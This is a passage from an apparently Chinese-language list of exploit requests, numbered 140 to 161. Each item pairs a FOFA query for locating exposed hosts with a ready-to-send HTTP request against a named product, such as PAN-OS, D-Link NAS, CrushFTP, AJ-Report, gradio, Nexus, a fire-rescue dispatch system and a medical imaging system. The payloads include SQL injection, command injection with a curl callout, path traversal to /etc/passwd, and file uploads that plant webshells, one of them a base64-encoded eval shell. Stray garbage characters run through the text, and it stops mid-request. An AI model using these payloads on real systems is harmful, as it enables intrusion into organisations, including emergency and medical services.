/ B3 f% Y% {1 j9 e2 a$ ZFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"+ q$ V( S) B% N" D( D6 @4 P
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
@2 j* A1 J; c+ KHost: x.x.x.x
l9 m1 t* m! n: H! t. p; B* UUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0& c ?( t7 K4 P* ^- L
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 g$ y/ o* G9 m( e5 ` @# i
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
- @6 w5 y0 @1 l; f# [0 ZAccept-Encoding: gzip, deflate, br: k' ?- s, D; n y8 Q
Connection: close6 F% _' y/ h% G8 s
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
* M* ~ p5 K( l3 i3 \! M8 JUpgrade-Insecure-Requests: 1
: z8 ]0 U$ y9 o) i9 D1 {5 R# J3 w# I) _
6 x, L; o. [) q9 b6 \+ E5 x* o140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入
) U) R; V8 f3 \- h2 z4 kCVE-2024-2566
4 y9 B1 g3 F1 A9 R4 \) c' M+ kFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
5 I6 c D+ A3 L7 M2 xGET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva×tamp=1&sign=1 HTTP/1.1: {) F' \% R2 N) h2 ]2 B) L
Host: x.x.x.x
1 J+ N. U1 f6 }% o r" IUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
) b$ o) x- v; H8 O+ i3 M: n6 l. KAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8; D' Z6 V8 l$ M" o6 [
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
! y) L/ r% d) |: n! yAccept-Encoding: gzip, deflate, br
2 X* d6 d5 Q2 \8 y: TConnection: close3 w w$ n+ {0 C, |- w
Cookie: authcode=h8g94 Z" P0 r8 F7 X, w1 c0 F5 V
Upgrade-Insecure-Requests: 11 z. D3 r! u) D/ T# x$ w. R
3 Y( I9 s3 }# L8 ?
5 X+ ]4 F, n: c# m: ^141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入) b, q) j- [( V7 Z1 u; W4 X1 L9 a5 V7 }
FOFA:body="指挥调度管理平台"
4 W& t& c$ W/ ~8 C- C0 ZPOST /app/ext/ajax_users.php HTTP/1.1
& b: R \+ d5 E9 r0 B; v9 q# F5 hHost: your-ip
( K/ n4 V s7 m: d' z7 XUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
$ [! x$ k; v3 h7 M' MContent-Type: application/x-www-form-urlencoded
4 o9 Z& [7 u) t0 N& Z/ d; l9 K9 \" l; m5 [6 A; a8 [
% _- K4 m* s, \5 ^! G7 V4 ]) ]; E
dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -# P' `% z r, r$ I3 z
) p& `# k$ G5 {" H& J. e/ q& \# Q' ^: L' i& ^, C; m% c
142. CMSV6车辆监控平台系统中存在弱密码
5 c, w7 k" o6 X' q0 SCVE-2024-29666! Q9 P) I5 j7 u6 L
FOFA:body="/808gps/"* S' r, Z1 H/ x f$ `7 p
admin/admin
: e/ {. h( K8 S. d2 L143. Netis WF2780 v2.1.40144 远程命令执行
2 k( t6 ?. o) ^4 |CVE-2024-258508 O2 x% g0 U/ \0 f o: y' r. P2 X
FOFA:title='AP setup' && header='netis') X9 f% L( w; Y+ o% I6 t7 F
PAYLOAD
* }$ t% A4 } M6 w3 X( D& @9 z
0 u x2 ]' i% c% m, k144. D-Link nas_sharing.cgi 命令注入
+ z. U8 p4 m3 f9 l" @4 G, N0 Q* OFOFA:app="D_Link-DNS-ShareCenter"4 i5 U7 ?1 b- Y( r0 j! X
system参数用于传要执行的命令, P! i. r" j& J! y# M" i5 H
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
& ?0 ?! ~* F7 Q& `3 ~1 g# W1 J& s" BHost: x.x.x.x, G1 n) t# |3 U' i+ y. {; E9 q0 p
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
+ b3 u I5 ] G2 ]# NConnection: close
. x# e; w3 {/ v5 n' f7 VAccept: */*
$ s _/ o! ~) q8 H' rAccept-Language: en
: W, T( Z* ?/ }Accept-Encoding: gzip
( _7 r: Y0 @7 K3 G8 O
+ e% ~* B5 S8 o: r3 R
$ U2 F: E& h7 ^1 r. f1 l145. Palo Alto Networks PAN-OS GlobalProtect 命令注入. ?8 t* U t# R" R3 c
CVE-2024-3400
, `& d, v# ]( I" A- A, U1 ?( AFOFA:icon_hash="-631559155"5 ]! a9 `" d) E0 W
GET /global-protect/login.esp HTTP/1.1% ~4 z. z# s: a/ P% @2 B$ ]8 ~% t
Host: 192.168.30.112:1005
) W( y& u) Q4 R' m6 j; |& W4 lUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.843 f5 e9 I6 G( L2 ], S1 I; R
Connection: close ^1 l7 E& `. R9 |! p7 _
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;
( B* I2 w) {! ]" gAccept-Encoding: gzip
7 _6 v m* R$ L }3 e9 |
2 x9 e1 r1 W. ~! d
L! ~7 E* `& s; ^2 a146. MajorDoMo thumb.php 未授权远程代码执行' d2 r' T! X: ]7 ~0 Q
CNVD-2024-02175
& h* K7 d3 _+ y$ a& rFOFA:app="MajordomoSL"
- P S8 ]- F+ V7 ?5 U9 F: `GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
+ D8 ]+ Y+ S1 V4 ^# WHost: x.x.x.x
& w5 \0 I/ x3 _' R- w% mUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
8 P6 _, l4 v1 mAccept-Charset: utf-87 Z3 m, c4 t Z. p3 g
Accept-Encoding: gzip, deflate
/ }0 N8 k. H/ ^7 C6 l- B4 |; _2 vConnection: close
, i5 p, G, i7 p5 ?; A% o4 {- R3 f6 R5 V3 d
+ i- y$ d) @8 v0 N; V0 b r9 p( I147. RaidenMAILD邮件服务器v.4.9.4-路径遍历
* a# |% z& b6 ]) D; uCVE-2024-32399
4 H# s& \6 V" E% xFOFA:body="RaidenMAILD" }$ M b. m/ q2 d9 l& _! |
GET /webeditor/../../../windows/win.ini HTTP/1.1
3 r' d% z% N- vHost: 127.0.0.1:81- M9 { k* `, B" @! V0 i l( u( I
Cache-Control: max-age=0
8 H) ?' b, \2 [2 n$ o1 q, YConnection: close% f- I6 t6 M8 C4 C
( x. L0 ]' x i$ D& q- z7 c: U# B5 k4 l5 d8 G8 `( d0 S6 ?1 t( y
148. CrushFTP 认证绕过模板注入
, d. f/ k& _0 p' [; k5 JCVE-2024-4040
$ V- s9 c8 z4 ~: ]$ Y, w$ lFOFA:body="CrushFTP"* Q0 }: W: ^' f1 \+ [6 D6 d3 G. ~% j: O% M
PAYLOAD
( b% c4 G9 D! Z; R5 V7 Z' q8 o0 o, c: K0 |& x$ I5 n
149. AJ-Report开源数据大屏存在远程命令执行
2 |1 A Z7 B/ N2 P, U* y; FFOFA:title="AJ-Report"
5 s! b0 ^4 a _1 [( y M% H* j- R3 ~. E/ ]" m$ O
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
! y4 n# ~. n' E- C( yHost: x.x.x.x6 }: x' l% c% f% p' S9 t0 d" o
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36! R; K$ r: v- }. y
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
/ l' S- ^; ~* q z4 bAccept-Encoding: gzip, deflate, br1 @1 I7 H2 n3 ]
Accept-Language: zh-CN,zh;q=0.9
9 P& r3 p; r$ W; j8 _/ ]Content-Type: application/json;charset=UTF-8
* p& L( Y2 q9 u7 Q6 S4 _% p! v; lConnection: close7 p" Y9 q% W# h0 @6 e0 V+ N; s
, m" X$ {; w& F/ D
{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}
1 K5 Y p! V7 D$ k) j; r( N2 n5 K6 y& U9 d0 Q- D7 Z: `$ ]
150. AJ-Report 1.4.0 认证绕过与远程代码执行
' U- c W" w( h7 {. w9 XFOFA:title="AJ-Report"& F W5 B5 o+ d0 }. I: K" M1 r
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1$ \( | C2 w: \' } N$ C
Host: x.x.x.x
: D. p6 J5 z* o, E( vUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36+ s5 ~& {2 F; v5 V
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7$ L' R( N+ L+ Q& v4 a% L* Q1 f
Accept-Encoding: gzip, deflate, br
9 e0 \8 v j- E* g& hAccept-Language: zh-CN,zh;q=0.96 b* u; _# m! Z) F3 {) K' S
Content-Type: application/json;charset=UTF-8
7 R# {# C* z4 R. ?Connection: close
% g1 @7 N, o& d& i: F( t& |8 fContent-Length: 339
( e1 `: c9 i- [3 W+ p2 B% }+ f2 w1 q: ` S0 H3 J d
{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}
$ l- m2 U( }4 O) t: ^
( f7 {& E1 F4 j4 T
7 X+ k v3 ]8 n8 W% R/ C5 J: |7 _7 Q151. AJ-Report 1.4.1 pageList sql注入
, P0 |( c! \7 I9 B8 D6 pFOFA:title="AJ-Report"
7 N) e# @; _2 ]$ qGET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.12 ], G. r8 V0 C. h/ ] t
Host: x.x.x.x1 M. m- s8 B ?3 w! n, h
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15) E3 V Y2 [6 a8 L1 w/ f" M+ i
Connection: close. P3 _. Q3 d' p c) d3 D4 ^
Accept-Encoding: gzip( z+ w9 _6 @4 u! E# |9 ?- a/ Y
! f" g4 w+ G/ Q* g h1 n1 G; f7 ~8 e% f3 I2 t0 [, t9 j: x
152. Progress Kemp LoadMaster 远程命令执行7 |0 O [ E) A8 f) c6 i4 f' l
CVE-2024-1212
1 O6 I2 v# R1 J% o8 K5 I' Q. fLoadMaster <= 7.2.59.2 (GA)3 J/ ~/ ^; F$ k
LoadMaster<=7.2.54.8 (LTSF)
' y$ a P" `; W. U* C' R) t. aLoadMaster <= 7.2.48.10 (LTS)4 v" q( d; y* y0 |; U t4 z! o+ ]3 S
FOFA:body="LoadMaster"
: ~5 s, m" c% C; H- _; XJztsczsnOmRvZXNub3RtYXR0ZXI=是';ls;':doesnotmatter的base64编码
* R+ C; w) E# I# q% R8 zGET /access/set?param=enableapi&value=1 HTTP/1.1
+ n8 e q. m8 {6 X M2 p' eHost: x.x.x.x" a X- k$ ^7 X; \5 a" l
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
; |. l0 }$ F. i. f v6 `( Y" ZConnection: close0 U# {* A) V7 U$ L
Accept: */*' F/ T | i3 y& Q0 M* k
Accept-Language: en0 h# y S4 O/ ^" u! r: b
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=% F+ s: _/ x8 e$ p( t/ \) l, d: d
Accept-Encoding: gzip2 \7 t- ]7 P5 t+ t* @
5 H" L# f& w2 B; I# k3 }! o. B! |0 p/ f7 z* w; j+ E Y4 u
153. gradio任意文件读取
- W4 Z/ W) e* x$ g4 UCVE-2024-1561FOFA:body="__gradio_mode__"
- Z) d) D5 p3 n第一步,请求/config文件获取componets的id6 P; I: n: G: E+ ?0 g5 a% R! _
http://x.x.x.x/config
$ g5 s x7 g( q/ r
+ b1 @ g/ e2 a( \% h3 x1 Q& r5 [/ v; g6 q. o3 b* g6 T" G
第二步,将/etc/passwd的内容写入到一个临时文件3 I4 @9 l0 J0 H+ _& d, |
POST /component_server HTTP/1.1+ W5 A5 O" J/ l9 d/ Q+ D
Host: x.x.x.x
* g r7 X0 K* UUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.30 a* [; a( c/ w8 x4 z. m
Connection: close8 l1 h0 B( T! R! b R
Content-Length: 115( |1 i% o( t8 _% y5 p
Content-Type: application/json
! D0 k% Z- j) Q) g2 IAccept-Encoding: gzip' b9 ?" Z8 M1 ^7 v |2 Z
2 \0 _, y Z- a$ w1 ~# g{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}+ D4 x6 V5 A P: e( z; J
2 L% e/ N; U6 X* {
( H+ j7 x8 }. @6 `' `' X. y6 `第三步访问! r" @4 r, O' X4 {2 d
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd' v3 u# S+ S1 p! i
* S3 L- L( O$ q3 `# _1 J% Z B* z
4 Y1 t' l, C. s/ Z+ U) C0 _
154. 天维尔消防救援作战调度平台 SQL注入8 E% t" R1 ]( z
CVE-2024-3720FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
: t' \4 L( J8 H7 C5 [POST /twms-service-mfs/mfsNotice/page HTTP/1.1) r" a/ o. }( m+ c1 J. ?: t; M a
Host: x.x.x.x
$ R$ N2 u% ?( C: ~Content-Length: 106
; J; v8 ~- C( `Cache-Control: max-age=0
! e1 G& z3 V% h( l# I8 B* K% ]7 ?Upgrade-Insecure-Requests: 1
* d* Q% J3 W& M' SOrigin: http://x.x.x.x
. k7 y6 f7 G I l7 M" v$ m+ f rContent-Type: application/json1 o4 j! X' H& ?$ D4 q! G
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.365 ?6 H% b$ d$ x% X
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
$ H( @' K }5 x0 t' CReferer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
" Y8 U6 B1 K, p2 KAccept-Encoding: gzip, deflate: @4 F& ~: f4 Y
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.72 g! n; k: M: o U" s: O
Connection: close: u& h9 J2 c7 k2 y. x
+ S* |* W2 @( n2 K
{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}
6 A- h5 Y: S) V) |5 W# s8 A8 W4 h6 e
4 \ R L0 N: j155. 六零导航页 file.php 任意文件上传
0 X% M0 T1 F& m- kCVE-2024-34982
# ~4 C) f& w! L# a6 h5 gFOFA:title=="上网导航 - LyLme Spage"
3 k8 Z" Z: m, `" E! c) F4 O0 m$ ~, xPOST /include/file.php HTTP/1.1" b% K, M' |$ W7 r( K* A( F9 W" ]
Host: x.x.x.x& u }% T/ E+ X$ F
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
, d w' i: ?+ UConnection: close
1 L: Y2 y* V! s8 W6 l1 mContent-Length: 232- c5 q m9 R( k/ E2 T3 x( O
Accept: application/json, text/javascript, */*; q=0.01
, J" C. Y* w2 {( T* t2 j2 GAccept-Encoding: gzip, deflate, br
0 u8 R7 G: I! y6 j1 Z6 @! x0 nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2- j8 _! B( O& @7 P. V3 _- h
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
* i! Z$ I# z; z, i% Q; j# BX-Requested-With: XMLHttpRequest3 u3 f, w% q# r" A, a# D+ {, E
; c1 Y, D3 i9 u- J4 d; @7 A-----------------------------qttl7vemrsold314zg0f
1 D. w3 @& v8 T. ]4 G$ P8 F/ AContent-Disposition: form-data; name="file"; filename="test.php": g1 U" L5 }0 X
Content-Type: image/png
, U5 l* N- F* z. m, N4 }
5 L! I6 u9 Q" b2 q" w+ L! T- i<?php phpinfo();unlink(__FILE__);?>5 M9 _ L% y9 j3 V& p- x' \3 W, K
-----------------------------qttl7vemrsold314zg0f--, w. F3 [" d% t4 ~) E1 U* r
7 j/ w% r& G9 u1 y, M
! b. @; W8 M L' _访问回显文件http://x.x.x.x/files/upload/img_664ab7fd14d2c.php
/ f4 Z# a4 }% l% R: ^- n
" K1 v' s& [4 n" T156. TBK DVR-4104/DVR-4216 操作系统命令注入4 }* c: X8 ?% m" J, R/ P
CVE-2024-3721
8 U4 L( i, l! Q5 W2 X1 h3 c6 WFOFA:"Location: /login.rsp"! F( e0 w! w* s d. ^% U+ w k) U( d9 @
·TBK DVR-4104
7 _( }' ?6 f0 @' K$ p, E) a·TBK DVR-4216! y$ O; }$ ` j& V9 L9 \+ Y
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"
& A+ u l3 B% C( m, M
) B% j' r4 Q$ ?! L. _! g" `6 ]& P2 _/ ]* D7 ?4 V/ h& j
POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1- O, Z. Z2 N/ H4 n# {
Host: x.x.x.x6 S8 l7 R y: Z" l6 r7 _
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15$ s* N9 D6 l- J; t/ K. |: j
Connection: close
; k# Z* }0 I4 s. I, A7 w! c+ ]Content-Length: 0
# p% M4 F4 g* Q0 t) ~Cookie: uid=1
- g& H% l- h' @4 |7 Y! q7 i: M2 YAccept-Encoding: gzip! \3 r! Y) u1 t0 p
: n1 m( ]+ Y( r8 i
: Y- P8 H( _! Q157. 美特CRM upload.jsp 任意文件上传2 d2 U" J5 G) `) T4 d7 H
CNVD-2023-06971# c% |; G1 B" e( F
FOFA:body="/common/scripts/basic.js"
\2 Y d( B1 i1 q0 k# WPOST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
# v7 c3 p7 z! X1 {Host: x.x.x.x
: d( H% |0 z* F; z7 r) WUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36; q- t. |* I5 ~5 t: d, K% R* F+ [( N
Content-Length: 7091 c" n' c! {2 j Y( [- H% d
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
0 N" ~ j. A1 x- TAccept-Encoding: gzip, deflate
& a9 b, {& M$ B5 j) n6 PAccept-Language: zh-CN,zh;q=0.9; n. o) o) M2 I& f- ~" T
Cache-Control: max-age=0
7 P, \- n! y2 {5 S5 UConnection: close
9 i. I* C- V0 [# v& P& G7 `Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
( b6 K/ Y1 h0 c/ {) |Upgrade-Insecure-Requests: 1
6 H2 ]7 v6 N2 v# |# [6 b9 z. r- [, @* ?, z7 ~: Z; q8 y# {2 r
------WebKitFormBoundary1imovELzPsfzp5dN. L) |4 ?. L: m; a& b% k" F% B
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"! e8 L. I% G4 S/ \* K
Content-Type: application/octet-stream
d) {* D J3 x( G7 X5 h6 l3 K# \ R- t1 Y1 R8 x9 T0 M
nyhelxrutzwhrsvsrafb
4 p* X* _5 \& u+ p------WebKitFormBoundary1imovELzPsfzp5dN+ q4 p7 m1 t: |( j' g- M
Content-Disposition: form-data; name="key", E4 y* D; I* G% T9 _2 u' z
a O) U; F2 V% a! ]
null
5 H! T2 i+ h6 r7 x, M------WebKitFormBoundary1imovELzPsfzp5dN
5 O) a) o2 e5 Z# |Content-Disposition: form-data; name="form"
/ v @2 ]! V9 V( P3 b9 f) c9 ]# C9 h2 J; d0 E
null
( p! I- G B+ ?% w/ l------WebKitFormBoundary1imovELzPsfzp5dN0 Q* v: T _" I! [: V9 q2 }) O
Content-Disposition: form-data; name="field"7 i) c; K; w# P; B+ d
0 Y1 l: Q# g2 _1 G s+ p0 Vnull
2 l+ w H5 C: o------WebKitFormBoundary1imovELzPsfzp5dN/ j& a3 z# v4 ~, L. G' b* |
Content-Disposition: form-data; name="filetitile"
# y+ d6 d; g# k0 e1 h
6 w$ y. i- k8 ~: N& Y5 Dnull
# q n' s/ w* p5 ]! C+ [------WebKitFormBoundary1imovELzPsfzp5dN
" H8 [9 i8 m2 [# q' X' XContent-Disposition: form-data; name="filefolder"" {, g3 X2 R* c- P
& e+ z4 D9 o) u6 V! b8 l6 ?$ Hnull) @0 `1 M' p4 B& t" [, S
------WebKitFormBoundary1imovELzPsfzp5dN--
( G4 C( G: |9 d. Y) X. P
3 ]. s0 r3 v6 C5 M& A
- }" i0 n1 W$ Q' Q* I) g% a- X' thttp://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp, n6 K% a1 Y9 j4 D
9 t) h3 r. g% T" A: L/ H" f* Q
158. Mura-CMS-processAsyncObject存在SQL注入
5 G" M y; `# QCVE-2024-32640- x( E# l& M4 L9 L8 g& T7 [
FOFA:"Generator: Masa CMS"8 }( Q# s8 V5 W* d0 h3 W
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.11 z r; M1 y9 j1 b+ l% Y% n, W
Host: {{Hostname}}' B: o, @& O# c* c% D6 K1 r/ E
Content-Type: application/x-www-form-urlencoded
, t* e: a# F$ y: a! j
$ E8 G G1 @4 r2 K e" Xobject=displayregion&contenthistid=x\'&previewid=14 x, O5 ]- w( M. ~( W p$ l9 |
6 ^7 \, c- P0 U/ Y7 q+ B6 ^
- L( c# p8 ?* a" [! f' A$ H- h159. 英飞达医学影像存档与通信系统 WebJobUpload任意文件上传1 y p+ t h. M6 b
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")" ?/ q8 k. G, H6 E. A3 s% b
POST /webservices/WebJobUpload.asmx HTTP/1.1! U) ^% i: K8 E7 |; _ E
Host: x.x.x.x, w8 a) t2 J" Y7 M! y9 |
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
o/ r1 D5 n+ g1 e4 iContent-Length: 1080. H: y8 B3 t9 C; u& n/ r
Accept-Encoding: gzip, deflate5 r4 O& z! p7 N
Connection: close
& N/ O3 H7 L% ]) v4 t! zContent-Type: text/xml; charset=utf-8 |, t; @* Y! y
Soapaction: "http://rainier/jobUpload"9 e4 q# }- J6 m, T
+ M. Q5 ?9 K5 D/ v
<?xml version="1.0" encoding="utf-8"?>
4 c; I: w4 _) y<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
' h" I# d) b. T: N3 u<soap:Body>2 ^7 X& y2 m3 ]9 V' L R) [- g
<jobUpload xmlns="http://rainier">7 f1 Y% Q, [* f# H% }, C7 f7 D
<vcode>1</vcode> b( u7 ]9 @$ G1 E
<subFolder></subFolder>7 j: o' X* a* B' i2 I
<fileName>abcrce.asmx</fileName>. s$ q8 b+ s( D* L% o
<bufValue>PCVAIFdlYlNlcnZpY2UgTGFuZ3VhZ2U9IkpTY3JpcHQiIENsYXNzPSJXZWJTZXJ2aWNlMSIgJT4KIAppbXBvcnQgU3lzdGVtO2ltcG9ydCBTeXN0ZW0uV2ViO2ltcG9ydCBTeXN0ZW0uSU87aW1wb3J0IFN5c3RlbS5XZWIuU2VydmljZXM7CmltcG9ydCBTeXN0ZW0uV2ViLlNjcmlwdC5TZXJ2aWNlczsKaW1wb3J0IFN5c3RlbS5XZWI7CmltcG9ydCBTeXN0ZW0uV2ViLlNlcnZpY2VzOwogCnB1YmxpYyBjbGFzcyBXZWJTZXJ2aWNlMSBlleHRlbmRzIFdlYlNlcnZpY2UKewogCldlYk1ldGhvZEF0dHJpYnV0ZSBTY3JpcHRNZXRob2RBdHRyaWJ1dGUgZnVuY3Rpb24gQ21kc2hlbGwoUGFzcyA6IFN0cmluZykgOiBWb2lkCiAgICB7CiAgICAgICAgICAgIHZhciBjIID0gSHR0cENvbnRleHQuQ3VycmVudDsKICAgICAgICAgICAgdmFyIFJlcXVlc3QgPSBjLlJlcXVlc3Q7CiAgICAgICAgICAgIHZhciBSZXNwb25zZSA9IGMuUmVzcG9uc2U7CiAgICAgICAgICAgIGV2YWwoUGFzcyk7CiAgICCB9Cn0=</bufValue>
" U; T4 ]* r' F" y</jobUpload>
6 H. g+ u* d0 S' q6 f' w5 c9 X</soap:Body>8 c ~* ?/ E3 I
</soap:Envelope>
+ |+ l) m# P. B) N. G5 k9 H/ t& u
9 L* ?4 p" X5 S- q; X* F, A
# k/ M9 k" d4 g6 |/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World"). y: Z+ I( H8 A# O" h
7 R- W |3 u3 ^& r: U/ J
8 B+ v1 T" y* X1 v: Q: A" U160. Sonatype Nexus Repository 3目录遍历与文件读取
) H9 \3 K9 c' Z! o, f+ QCVE-2024-4956- O0 n9 i2 C0 ~3 S/ s
FOFA:title="Nexus Repository Manager"
+ j. R9 N- j* J+ p4 b v# n$ u: Z/ _$ BGET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1+ T6 v9 s/ i& b; k4 Q
Host: x.x.x.x3 t7 `; M7 }8 {+ R
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.05 _+ K& a4 c$ D: `# S
Connection: close
" g& a6 N' H3 `+ O9 [3 ?" s! cAccept: */*: m& ]/ t: y4 \. ^6 a/ k4 W$ j) I
Accept-Language: en
' n! ^ y5 L; cAccept-Encoding: gzip
5 K6 s/ g9 j3 X+ g$ i# T% h/ v' s2 T2 [: U
0 X4 A' N* H; Z y
161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传0 ~; b# v- k3 M z5 X1 L7 w
FOFA:body="/KT_Css/qd_defaul.css"4 V" n% ]+ G4 k$ y q
第一步,上传文件<fileName>字段指定文件名,<fileFlow>字段指定文件内容,内容需要base64加密/ a) w* ]% ^, z
POST /Webservice.asmx HTTP/1.1! n5 F* g6 x( Q6 r1 L+ t* t
Host: x.x.x.x
5 z8 G* Y0 ] u oUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36- F, n$ R! p }
Connection: close: w! _6 I0 X- V5 i* | x6 o% q4 ^
Content-Length: 445; o' g. F! {: { Q, U
Content-Type: text/xml
* r- n. A" j; f# H( a q# C- z# n P; \Accept-Encoding: gzip3 a+ }1 L# z6 F8 C5 n' G0 N$ O4 G+ z/ W
* |+ q; @4 p2 E: i( N
<?xml version="1.0" encoding="utf-8"?>3 i. x+ h: |" ^8 m; F$ V6 f
<soap:Envelope xmlns:xsi="! O& M/ L/ ]0 [, i& Q
